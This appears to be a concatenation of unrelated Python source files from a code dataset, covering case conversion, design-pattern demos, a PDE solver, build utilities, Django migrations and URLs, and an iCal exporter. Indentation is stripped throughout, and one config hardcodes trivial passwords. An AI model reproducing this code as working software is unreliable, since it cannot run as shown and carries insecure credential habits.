NETEASE_PASSWORD = "password"
NETEASE_BACKEND = "http://127.0.0.1:3000"
ADMIN_PASSWORD = "<PASSWORD>"
DJ_PASSWORD = "dj"
SEARCH_RESULT_COUNT_LIMIT = 30 | StarcoderdataPython |
3251241 | # -*- coding: utf-8 -*-
"""
* TencentBlueKing is pleased to support the open source community by making 蓝鲸智云-蓝鲸 PaaS 平台(BlueKing-PaaS) available.
* Copyright (C) 2017-2021 TH<NAME>, a Tencent company. All rights reserved.
* Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
* You may obtain a copy of the License at http://opensource.org/licenses/MIT
* Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
* an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
* specific language governing permissions and limitations under the License.
"""
import re
from typing import Callable, Iterable
__all__ = ["RegexCubingHelper", "CommonCaseRegexPatterns", "CommonCaseConvertor", "shortcuts"]
class RegexCubingHelper:
"""The best way to resolve a Rubik's cube is to take it apart and put it back together."""
def __init__(self, patterns: Iterable[str]):
self._pattern = re.compile("|".join(patterns))
def cubing(self, string: str, transform_fn: Callable[[Iterable[str]], Iterable[str]], sep: str) -> str:
"""Join the string with the given separator and transform the parts."""
parts = (i for i in self._pattern.split(string) if i)
return sep.join((i for i in transform_fn(parts) if i))
def cubing_capitalize_case(self, string: str, sep: str) -> str:
"""Join the string with the given separator and capitalize the parts."""
return self.cubing(string, lambda parts: (i.capitalize() for i in parts), sep)
def cubing_lower_case(self, string: str, sep: str) -> str:
"""Join the string with the given separator and lower case the parts."""
return self.cubing(string, lambda parts: (i.lower() for i in parts), sep)
def cubing_upper_case(self, string: str, sep: str) -> str:
"""Join the string with the given separator and upper case the parts."""
return self.cubing(string, lambda parts: (i.upper() for i in parts), sep)
class CommonCaseRegexPatterns:
"""The regex pattern for common case."""
CAMELCASE = r"(?<=[^A-Z])(?=[A-Z])"
SNAKECASE = r"_+"
DASHCASE = r"-+"
DOTCASE = r"\.+"
SPACECASE = r" +"
class CommonCaseConvertor:
"""The convertor for common case."""
def __init__(self, patterns: Iterable[str]):
self._helper = RegexCubingHelper(patterns)
def to_camel_case(self, string: str) -> str:
"""
Convert the string to camel case, like this:
>>> convertor = CommonCaseConvertor([CommonCaseRegexPatterns.SPACECASE])
>>> convertor.to_camel_case("Cubing Case")
'CubingCase'
"""
return self._helper.cubing_capitalize_case(string, "")
def to_lower_camel_case(self, string: str) -> str:
"""Convert the string to lower camel case, like this:
>>> convertor = CommonCaseConvertor([CommonCaseRegexPatterns.SPACECASE])
>>> convertor.to_lower_camel_case("Cubing Case")
'cubingCase'
"""
def transform(parts):
for index, part in enumerate(parts):
if index == 0:
yield part.lower()
else:
yield part.capitalize()
return self._helper.cubing(string, transform, "")
def to_lower_snake_case(self, string: str) -> str:
"""
Convert the string to lower snake case, like this:
>>> convertor = CommonCaseConvertor([CommonCaseRegexPatterns.SPACECASE])
>>> convertor.to_lower_snake_case("Cubing Case")
'cubing_case'
"""
return self._helper.cubing_lower_case(string, "_")
def to_upper_snake_case(self, string: str) -> str:
"""
Convert the string to upper snake case, like this:
>>> convertor = CommonCaseConvertor([CommonCaseRegexPatterns.SPACECASE])
>>> convertor.to_upper_snake_case("Cubing Case")
'CUBING_CASE'
"""
return self._helper.cubing_upper_case(string, "_")
def to_lower_dash_case(self, string: str) -> str:
"""
Convert the string to lower dash case, like this:
>>> convertor = CommonCaseConvertor([CommonCaseRegexPatterns.SPACECASE])
>>> convertor.to_lower_dash_case("Cubing Case")
'cubing-case'
"""
return self._helper.cubing_lower_case(string, "-")
def to_upper_dash_case(self, string: str) -> str:
"""Convert the string to upper dash case, like this:
>>> convertor = CommonCaseConvertor([CommonCaseRegexPatterns.SPACECASE])
>>> convertor.to_upper_dash_case("Cubing Case")
'CUBING-CASE'
"""
return self._helper.cubing_upper_case(string, "-")
def to_lower_dot_case(self, string: str) -> str:
"""Convert the string to lower dot case, like this:
>>> convertor = CommonCaseConvertor([CommonCaseRegexPatterns.SPACECASE])
>>> convertor.to_lower_dot_case("Cubing Case")
'cubing.case'
"""
return self._helper.cubing_lower_case(string, ".")
def to_capitalize_dot_case(self, string: str) -> str:
"""Convert the string to upper dot case, like this:
>>> convertor = CommonCaseConvertor([CommonCaseRegexPatterns.SPACECASE])
>>> convertor.to_capitalize_dot_case("Cubing Case")
'Cubing.Case'
"""
return self._helper.cubing_capitalize_case(string, ".")
def to_lower_space_case(self, string: str) -> str:
"""Convert the string to lower space case, like this:
>>> convertor = CommonCaseConvertor([CommonCaseRegexPatterns.SPACECASE])
>>> convertor.to_lower_space_case("Cubing Case")
'cubing case'
"""
return self._helper.cubing_lower_case(string, " ")
shortcuts = CommonCaseConvertor(
(
CommonCaseRegexPatterns.CAMELCASE,
CommonCaseRegexPatterns.SNAKECASE,
CommonCaseRegexPatterns.DASHCASE,
CommonCaseRegexPatterns.DOTCASE,
CommonCaseRegexPatterns.SPACECASE,
)
)
| StarcoderdataPython |
96669 | <reponame>zhichengMLE/python-design-pattern<gh_stars>0
# The observer pattern is a software design pattern in which an object, called the subject,
# maintains a list of its dependents, called observers, and notifies them automatically of
# any state changes, usually by calling one of their methods.
# See more in wiki: https://en.wikipedia.org/wiki/Observer_pattern
#
# We will use Observer pattern to build a subscription system which notify all observers
# when you have updates.
# Observer Class
class Observer(object):
def __init__(self, id):
self._id = id
def update(self, message):
print("Observer %d get the update : %s" %(self._id, message))
# Subject Class: is being observed by Observer
class Subject(object):
def __init__(self):
self._observer_list = []
self._message = ""
def add_observer(self, observer):
self._observer_list.append(observer)
def set_message(self, message):
self._message = message
def notify_observers(self):
for observer in self._observer_list:
observer.update(self._message)
if __name__ == '__main__':
subject = Subject()
subject.add_observer(Observer(1))
subject.add_observer(Observer(2))
subject.add_observer(Observer(3))
subject.set_message("This is the overview of 2016, ...")
subject.notify_observers()
subject.add_observer(Observer(4))
subject.add_observer(Observer(5))
subject.set_message("This is the overview of 2017, ...")
subject.notify_observers()
subject.add_observer(Observer(6))
subject.set_message("This is the overview of 2018, ...")
subject.notify_observers()
| StarcoderdataPython |
3212139 | <gh_stars>0
import numpy as np
import probability_initial
import delay_file
def at2u0(pe,l,L, p_arr):
a = l+1
b = -l
temp = a*p_arr[int(L-1-l)][int(pe)]+b*p_arr[int(L-2-l)][int(pe)]
return temp
def cd2u1(u,cx,dx,nx,Eqflag,Syncflag,L=None,PE=None,perPE=None,pstart=None,pend=None,ATolFLAG=None):
'''For a given time step t to t+delt'''
# u,du,C all take 1-D
rhs=np.zeros_like(u)
C=np.zeros_like(u)
'''Concentration array'''
if(Eqflag=='DBurgers'):
C=u.copy()
if((Eqflag=='DAdvection') or (Eqflag=='DAD')):
for i in range(nx):
C[i]=cx
if(Syncflag=='DSync'):
rhs[0] = -C[0]*(u[1] - u[nx-2])/(2*dx)
rhs[nx-1] = -C[nx-1]*(u[1] - u[nx-2])/(2*dx)
for i in range(1,nx-1):
rhs[i] = -C[i]*(u[i+1] - u[i-1])/(2*dx)
return rhs
elif(Syncflag=='DAsync'):
## Interior point computations ##
for pe in range(PE):
for i in range(pe*perPE+1,perPE*(pe+1)-1):
rhs[i] = -C[i]*(u[i+1] - u[i-1])/(2*dx)
## Assigning values to buffer array ##
#L=max_delay
## pend with left_pt & pstart with right_pt ##
#Different l use
if(ATolFLAG==None):
l=int(delay_file.delay_())
rhs[0] = -C[0]*(u[1] - pend[L-1-l][PE-1])/(2*dx)
l=int(delay_file.delay_())
rhs[nx-1] = -C[nx-1]*(pstart[L-1-l][0*PE]- u[nx-2])/(2*dx)
#Processor Boundary points
for pe in range(PE-1):
right_pt = perPE*(pe+1)-1
l=int(delay_file.delay_())
rhs[right_pt] = -C[right_pt]*(pstart[L-1-l][(right_pt+1)//perPE] - u[right_pt-1])/(2*dx)
l=int(delay_file.delay_())
left_pt = perPE*(pe+1)
rhs[left_pt] = -C[left_pt]*(u[left_pt+1] - pend[L-1-l][(left_pt+1)//perPE - 1])/(2*dx)
elif(ATolFLAG=='DAT2'):
l=int(delay_file.delay_())
rhs[0] = -C[0]*(u[1] - at2u0(PE-1,l,L,pend) )/(2*dx)
l=int(delay_file.delay_())
rhs[nx-1] = -C[nx-1]*( at2u0(0,l,L,pstart) - u[nx-2] )/(2*dx)
#Processor Boundary points
for pe in range(PE-1):
right_pt = perPE*(pe+1)-1
l=int(delay_file.delay_())
rhs[right_pt] = -C[right_pt]*( at2u0((right_pt+1)/perPE,l,L,pstart)- u[right_pt-1])/(2*dx)
l=int(delay_file.delay_())
left_pt = perPE*(pe+1)
rhs[left_pt] = -C[left_pt]*(u[left_pt+1] - at2u0((left_pt+1)//perPE - 1,l,L,pend))/(2*dx)
pstart_out=pstart[1:]
pend_out=pend[1:]
return rhs,pstart_out,pend_out
def euler(u,rhs,dt,nx):
# v=np.zeros_like(u)
# for i in range(nx):
# v[i]=u[i]+dt*rhs[i]
u=u+dt*rhs
return u
# import numpy as np
# import probability_initial
# import delay_file
# def cd2u1(u,cx,dx,nx,Eqflag,Syncflag,L=None,PE=None,perPE=None,pstart_in=None,pend_in=None):
# '''For a given time step t to t+delt'''
# # u,du,C all take 1-D
# rhs=np.zeros_like(u)
# C=np.zeros_like(u)
# '''Concentration array'''
# if(Eqflag=='DBurgers'):
# C=u.copy()
# if((Eqflag=='DAdvection') or (Eqflag=='DAD')):
# for i in range(nx):
# C[i]=cx
# if(Syncflag=='DSync'):
# rhs[0] = -C[0]*(u[1] - u[nx-2])/(2*dx)
# rhs[nx-1] = -C[nx-1]*(u[1] - u[nx-2])/(2*dx)
# for i in range(1,nx-1):
# rhs[i] = -C[i]*(u[i+1] - u[i-1])/(2*dx)
# return rhs
# elif(Syncflag=='DAsync'):
# ## Interior point computations ##
# for pe in range(PE):
# for i in range(pe*perPE+1,perPE*(pe+1)-1):
# rhs[i] = -C[i]*(u[i+1] - u[i-1])/(2*dx)
# ## Assigning values to buffer array ##
# #L=max_delay
# pstart=np.zeros((L,PE))
# pend=np.zeros((L,PE))
# pstart[:-1]=pstart_in
# pend[:-1]=pend_in
# pstart[L-1],pend[L-1]=probability_initial.prob_1D_from_u_1D(u,PE,perPE)
# ## pend with left_pt & pstart with right_pt ##
# #Different l use
# l=int(delay_file.delay_())
# rhs[0] = -C[0]*(u[1] - pend[L-1-l][PE-1])/(2*dx)
# l=int(delay_file.delay_())
# rhs[nx-1] = -C[nx-1]*(pstart[L-1-l][0*PE]- u[nx-2])/(2*dx)
# #Processor Boundary points
# for pe in range(PE-1):
# right_pt = perPE*(pe+1)-1
# l=int(delay_file.delay_())
# rhs[right_pt] = -C[right_pt]*(pstart[L-1-l][(right_pt+1)//perPE] - u[right_pt-1])/(2*dx)
# l=int(delay_file.delay_())
# left_pt = perPE*(pe+1)
# rhs[left_pt] = -C[left_pt]*(u[left_pt+1] - pend[L-1-l][(left_pt+1)//perPE - 1])/(2*dx)
# pstart_out=pstart[1:]
# pend_out=pend[1:]
# return rhs,pstart_out,pend_out
# def euler(u,rhs,dt,nx):
# # v=np.zeros_like(u)
# # for i in range(nx):
# # v[i]=u[i]+dt*rhs[i]
# u=u+dt*rhs
# return u | StarcoderdataPython |
1713495 | <filename>URI-1042_Sort_Simples.py
/*-------------------*
| <NAME> |
| URI 1042 |
| Sort Simples |
*--------------------*/
# -*- coding: utf-8 -*-
A,B,C = map (int,input().split())
LISTA = [A, B, C]
for x in sorted(LISTA):
print (x)
print("")
print(A)
print(B)
print(C) | StarcoderdataPython |
1744290 | <gh_stars>0
#!/usr/bin/python3
# Author: <NAME>
# License: MIT
# ULR: https://github.com/iblis-ms/python_cmake_build_system
import os
import subprocess
from builtins import staticmethod
import sys
import urllib.request
import logging
from .sysOp import SysOp
class Utils:
"""
Class that helps running CMake.
"""
@staticmethod
def sysOp():
if not hasattr(Utils, 'sysop'):
Utils.sysop = SysOp()
return Utils.sysop
@staticmethod
def downloadScript(url, output_path):
logger = logging.getLogger("BuildSystemTest")
response = requests.get(url, allow_redirects=True)
if response.status_code != 200:
logger.error('Downloading ' + str(url) + ' to ' + str(output_path) + ' FAILED')
return False
logger.info('Downloading ' + str(url) + ' to ' + str(output_path))
open(output_path, 'wb').write(response.content)
return True
@staticmethod
def run(cmd, working_dir, env = None, collect_output = False, output_file_path = None):
"""Runs given command in given working directory
Parameters
----------
cmd : array
Command to run. The program and each argument is item in the array, i. e. ['echo', '${PATH']
working_dir : string
working directory - location from command will be run
Returns
-------
int
Error code from run command. 0 means finished successfully.
"""
logger = logging.getLogger("BuildSystemTest")
os.environ['PYTHONUNBUFFERED'] = "1" # to not buffer logs, but print immediately
logger.info("####################################### <run> #######################################")
logger.info("Working Directory: " + working_dir)
logger.info("Command: " + ' '.join(cmd))
shell = False
if Utils.sysOp().windows:
shell = True
proc = subprocess.Popen(cmd,
stdout = subprocess.PIPE,
stderr=subprocess.STDOUT,
cwd = working_dir,
shell=shell,
env = env
)
logger.info("-------------------------------------- <output> -------------------------------------")
output_txt = ''
output_file = None
if output_file_path is not None:
output_file = open(output_file_path, "w")
while True:
output = proc.stdout.readline()
pol = proc.poll()
if (output == '' or output == b'') and pol is not None:
break
if output:
strLineWithNewLine = output.decode(errors='ignore')
if collect_output:
output_txt = output_txt + strLineWithNewLine
if output_file is not None:
output_file.write(strLineWithNewLine)
line = strLineWithNewLine[:-1]
logger.info(line)
proc.stdout.close()
return_code = proc.poll()
if output_file is not None:
output_file.close()
logger.info("-------------------------------------- </output> ------------------------------------")
logger.info("Return code: " + str(return_code))
logger.info("####################################### </run> ######################################")
if collect_output:
return return_code, output_txt
else:
return return_code, None
| StarcoderdataPython |
16001 | <reponame>marin-leonard/marsha
# Generated by Django 3.0.6 on 2020-05-19 14:32
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("core", "0018_auto_20200603_0620"),
]
operations = [
migrations.AddField(
model_name="video",
name="live_info",
field=models.JSONField(
blank=True,
help_text="Information needed to manage live streaming",
null=True,
verbose_name="Live info",
),
),
migrations.AddField(
model_name="video",
name="live_state",
field=models.CharField(
blank=True,
choices=[
("idle", "idle"),
("starting", "starting"),
("running", "running"),
("stopped", "stopped"),
],
help_text="state of the live mode.",
max_length=20,
null=True,
verbose_name="live state",
),
),
]
| StarcoderdataPython |
1701705 | <filename>examples/plugins/workbench/AcmeLabUsingEggs/src/acme.acmelab/acme/acmelab/api.py
from acmelab import Acmelab
| StarcoderdataPython |
1658465 | <filename>abhisek/Separate_word_start_with_P.py
'''
Write a Python program to match if two words from a list of words starting with letter 'P'.
'''
import re
# Sample strings.
words = ["Python PHP", "Java JavaScript", "c c++"]
for word in words:
match = re.search(r'(P\w+)\s{1,}(P\w+)', word)
if match:
print "First word:"
print match.group(1)
print "Second word:"
print match.group(2)
| StarcoderdataPython |
1747380 | <reponame>pka/ical2json
import argparse
import json
from datetime import date, timedelta, datetime
from icalevents import icalevents, icalparser
def ical_to_json(url, start, days):
end = start + timedelta(days=days)
events = icalevents.events(
url=url,
start=start,
end=end
)
events.sort(key=lambda event: icalparser.normalize(event.start))
# for event in events:
# print("%s: %s" % (event.start, event.summary))
return json.dumps(events,
indent=2,
ensure_ascii=False,
default=json_converter)
def json_converter(o):
if isinstance(o, datetime):
return o.__str__()
elif isinstance(o, icalparser.Event):
return event_to_dict(o)
def event_to_dict(event):
return {
'summary': event.summary,
'description': event.description,
'start': event.start,
'end': event.end,
'all_day': event.all_day,
'recurring': event.recurring,
'location': event.location,
'private': event.private,
'created': event.created,
'last_modified': event.last_modified,
'sequence': event.sequence,
'attendee': event.attendee,
'organizer': event.organizer
}
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("--start", type=date.fromisoformat,
default=date.today())
parser.add_argument("--days", type=int, default=365)
parser.add_argument("url")
args = parser.parse_args()
print(ical_to_json(args.url, args.start, args.days))
| StarcoderdataPython |
3310070 | <reponame>unistra/eva
from django.conf.urls import url
from .views import DegreeListView, DegreeTypeListView, DegreeTypeCreate, \
DegreeTypeUpdate, DegreeTypeDelete, DegreeCreateView, DegreeUpdateView, \
DegreeDeleteView
from django_cas.decorators import login_required
urlpatterns = [
url(r'^list/(?P<filter>|all|current)/(?P<cmp>\w+)/$',
login_required(DegreeListView.as_view()),
name='list'),
url(r'^create$', login_required(DegreeCreateView.as_view()),
name='degree_create'),
url(r'^(?P<id>\d+)/$', login_required(DegreeUpdateView.as_view()),
name='degree_edit'),
url(r'^delete/(?P<id>\d+)/$', login_required(DegreeDeleteView.as_view()),
name='degree_delete'),
url(r'^type/$', login_required(DegreeTypeListView.as_view()),
name='type'),
url(r'^type/create$', login_required(DegreeTypeCreate.as_view()),
name='type_create'),
url(r'^type/(?P<id>\d+)/$', login_required(DegreeTypeUpdate.as_view()),
name='type_edit'),
url(r'^type/delete/(?P<id>\d+)/$',
login_required(DegreeTypeDelete.as_view()),
name='type_delete'),
]
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.